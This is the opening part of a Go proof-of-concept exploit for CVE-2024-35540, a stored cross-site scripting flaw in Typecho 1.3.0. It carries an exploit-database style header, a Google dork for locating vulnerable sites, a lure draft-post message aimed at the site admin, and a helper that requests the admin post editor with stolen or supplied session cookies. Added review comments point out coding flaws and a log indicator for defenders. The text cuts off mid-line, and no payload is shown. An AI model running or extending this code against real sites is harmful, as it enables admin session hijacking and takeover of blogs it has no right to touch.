// Exploit Title: Typecho <= 1.3.0 Stored Cross-Site Scripting (XSS)
// Google Dork: intext:"Powered by Typecho" inurl:/index.php
// Date: 18/08/2024
// Exploit Author: Michele 'cyberaz0r' Di Bonaventura
// Vendor Homepage: https://typecho.org
// Software Link: https://github.com/typecho/typecho
// Version: 1.3.0
// Tested on: Typecho 1.3.0 Docker Image with PHP 7.4 (https://hub.docker.com/r/joyqi/typecho)
// CVE: CVE-2024-35540
// For more information, visit the blog post: https://cyberaz0r.info/2024/08/typecho-multiple-vulnerabilities/

package main

import (
	"bufio"
	"bytes"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"fmt"
	"net/http"
	"net/url"
	"os"
	"strings"
	"time"
)

// Package-level configuration shared by the requests this file sends.
// All values are fixed at compile time; none are read from the command line
// in the part of the file visible here.
var (
	// Title and body of the draft post the PoC creates (used later in the file;
	// not referenced by getEditUrl below).
	postTitle string = "Reflected XSS PoC"
	postText  string = "Hey admin! Look at the draft of this blog post, can I publish it?"
	// Fixed browser-like User-Agent sent on every request. Because it never
	// varies, it is a convenient string for defenders to pivot on in web-server
	// logs together with the admin paths requested.
	userAgent string = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
	// Shared HTTP client. CheckRedirect returns http.ErrUseLastResponse, so
	// 3xx responses are returned to the caller as-is instead of being
	// followed; this lets the code inspect the redirect response itself.
	// NOTE(review): no Timeout is set, so a non-responding server blocks
	// client.Do indefinitely.
	client *http.Client = &http.Client{
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}
)

// getEditUrl sends a GET to <u>/admin/write-post.php with the caller-supplied
// cookies and inspects the response body. It returns "" when the request
// cannot be built or sent; what it returns on success is decided by code
// past the end of this view (the function continues beyond the visible
// source).
//
// u is the base URL of the Typecho instance (no trailing slash, since the
// path is concatenated directly). cookies is sent verbatim as the Cookie
// header, so it is expected to hold an already-authenticated session.
func getEditUrl(u string, cookies string) string {
	req, err := http.NewRequest("GET", u+"/admin/write-post.php", nil)
	if err != nil {
		fmt.Println("[X] Error creating initial request:", err)
		return ""
	}
	req.Header.Set("Cookie", cookies)
	req.Header.Set("User-Agent", userAgent)
	resp, err := client.Do(req)
	if err != nil {
		fmt.Println("[X] Error sending initial request:", err)
		return ""
	}
	// NOTE(review): the error returned by ReadFrom is discarded, and
	// resp.Body is not closed anywhere in the visible part of the function;
	// a truncated read would silently yield a partial body below.
	buf := new(bytes.Buffer)
	buf.ReadFrom(resp.Body)
	body := buf.String()
	if !strings.Contains(body, "